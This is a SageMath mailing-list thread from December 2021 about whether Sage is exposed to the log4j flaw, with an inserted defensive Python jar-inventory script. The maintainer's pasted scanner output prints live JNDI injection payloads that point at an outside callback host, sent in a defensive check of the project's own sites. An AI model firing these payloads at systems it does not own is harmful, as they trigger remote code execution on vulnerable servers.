log4j


Angela Hicks

Dec 14, 2021, 9:47:31 AM12/14/21
to sage-support
Has anyone more knowledgeable than I (admittedly a low bar) about sage's internals (admittedly a low bar) thought about whether sage uses any libraries that make it vulnerable to the log4j vulnerability?
-Angela

William Stein

Dec 14, 2021, 4:54:37 PM12/14/21
to sage-s...@googlegroups.com
I think that Sage doesn’t make any use of the JVM or Java so Sage is not vulnerable to the log4j exploit. 

On Tue, Dec 14, 2021 at 6:47 AM Angela Hicks <anh...@lehigh.edu> wrote:
Has anyone more knowledgeable than I (admittedly a low bar) about sage's internals (admittedly a low bar) thought about whether sage uses any libraries that make it vulnerable to the log4j vulnerability?
-Angela

--
You received this message because you are subscribed to the Google Groups "sage-support" group.
To unsubscribe from this group and stop receiving emails from it, send an email to sage-support...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/sage-support/c944dbbe-d640-4a25-b9e8-9c0f0c13b437n%40googlegroups.com.
--
-- William Stein
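As an added, defender-side check (not code from this thread, from Sage, or from the scanner mentioned later), this script inventories a directory tree for log4j-core jars that still ship JndiLookup.class with a version in the CVE-2021-44228 range. It assumes only the Python standard library; the fixture jars it builds are constructed, and the version cut-offs reflect the 2.15.0 fix and the 2.12.2 backport.

```python
# Added example, not from the thread: offline inventory of log4j-core jars for
# CVE-2021-44228. Assumes only the Python standard library; fixtures are constructed.
import os, re, tempfile, zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def is_affected(version, has_jndi):
    """CVE-2021-44228 covers 2.0-beta9..2.14.1, except the 2.12.2 backport fix.
    Removing JndiLookup.class mitigates any version; unknown version + class = affected."""
    if not has_jndi:
        return False
    if version is None:
        return True
    return version < (2, 12, 2) or (2, 13, 0) <= version < (2, 15, 0)

def inspect_jar(path):
    """Finding dict for a log4j-core jar, or None if the file is not one."""
    try:
        with zipfile.ZipFile(path) as jar:
            names = set(jar.namelist())
            if POM_PROPS not in names and JNDI_CLASS not in names:
                return None
            props = jar.read(POM_PROPS).decode("utf-8", "replace") if POM_PROPS in names else ""
    except zipfile.BadZipFile:
        return None
    m = re.search(r"^version=(\d+(?:\.\d+)*)", props, re.MULTILINE)
    version = tuple(int(p) for p in m.group(1).split(".")) if m else None
    has_jndi = JNDI_CLASS in names
    return {"path": path, "version": version, "has_jndi": has_jndi,
            "affected": is_affected(version, has_jndi)}

def scan_tree(root):
    """Inspect every .jar under root (jars nested inside fat jars are not unpacked)."""
    paths = [os.path.join(d, f) for d, _, fs in os.walk(root) for f in sorted(fs)
             if f.lower().endswith(".jar")]
    return [finding for finding in map(inspect_jar, paths) if finding]

def demo():
    """Constructed fixtures: three minimal jars shaped like log4j-core, then a scan."""
    root = tempfile.mkdtemp()
    for name, version, with_jndi in [("a-2.14.1.jar", "2.14.1", True),
                                     ("b-2.14.1-stripped.jar", "2.14.1", False),
                                     ("c-2.17.1.jar", "2.17.1", True)]:
        with zipfile.ZipFile(os.path.join(root, name), "w") as jar:
            jar.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
            if with_jndi:
                jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return scan_tree(root)
```

Point scan_tree at a Sage install prefix (or any host directory) to confirm the "no Java, no log4j" claim by inventory rather than by assumption.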

Angela Hicks

Dec 14, 2021, 5:14:26 PM12/14/21
to sage-s...@googlegroups.com
Thanks, William!
Best,
Angela


Adil Hasan

Dec 14, 2021, 5:25:12 PM12/14/21
to sage-s...@googlegroups.com
Hello folks,

In case you are concerned that you may be impacted by the Java log4j bug, you can download this application which will check if a supplied url is vulnerable to the bug:



Hth adil

William Stein

Dec 14, 2021, 7:53:13 PM12/14/21
to sage-support
On Tue, Dec 14, 2021 at 2:25 PM Adil Hasan <adilh...@gmail.com> wrote:
Hello folks,

In case you are concerned that you may be impacted by the Java log4j bug, you can download this application which will check if a supplied url is vulnerable to the bug:


Thanks.  It seems the sagemath.org infrastructure is in good shape regarding this:

Last login: Tue Dec 14 16:45:00 on ttys058
wstein@max ~ % python3 log4j-scan.py -u https://ask.sagemath.org
/Library/Frameworks/Python.framework/Versions/3.10/bin/python3: can't open file '/Users/wstein/log4j-scan.py': [Errno 2] No such file or directory
wstein@max ~ % cd /tmp/log4j-scan

wstein@max log4j-scan % python3 log4j-scan.py -u https://ask.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://ask.sagemath.org
[•] URL: https://ask.sagemath.org | PAYLOAD: ${jndi:ldap://ask.sagemath.org.9187j80iik2n4oq9ud1re041i81939unm.interact.sh/tjtni2c}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan % python3 log4j-scan.py -u https://wiki.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://wiki.sagemath.org
[•] URL: https://wiki.sagemath.org | PAYLOAD: ${jndi:ldap://wiki.sagemath.org.5607rfj3i02047m4itt61pu684hsv539c.interact.sh/zpbgczb}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan % python3 log4j-scan.py -u https://trac.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://trac.sagemath.org
[•] URL: https://trac.sagemath.org | PAYLOAD: ${jndi:ldap://trac.sagemath.org.xgge21465p6t46hq87n64t350054fg25o.interact.sh/kjy8og1}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan % python3 log4j-scan.py -u https://www.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://www.sagemath.org
[•] URL: https://www.sagemath.org | PAYLOAD: ${jndi:ldap://www.sagemath.org.bx6i660og07o49v6qb2f9ou48r846433j.interact.sh/1qs7xvd}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan %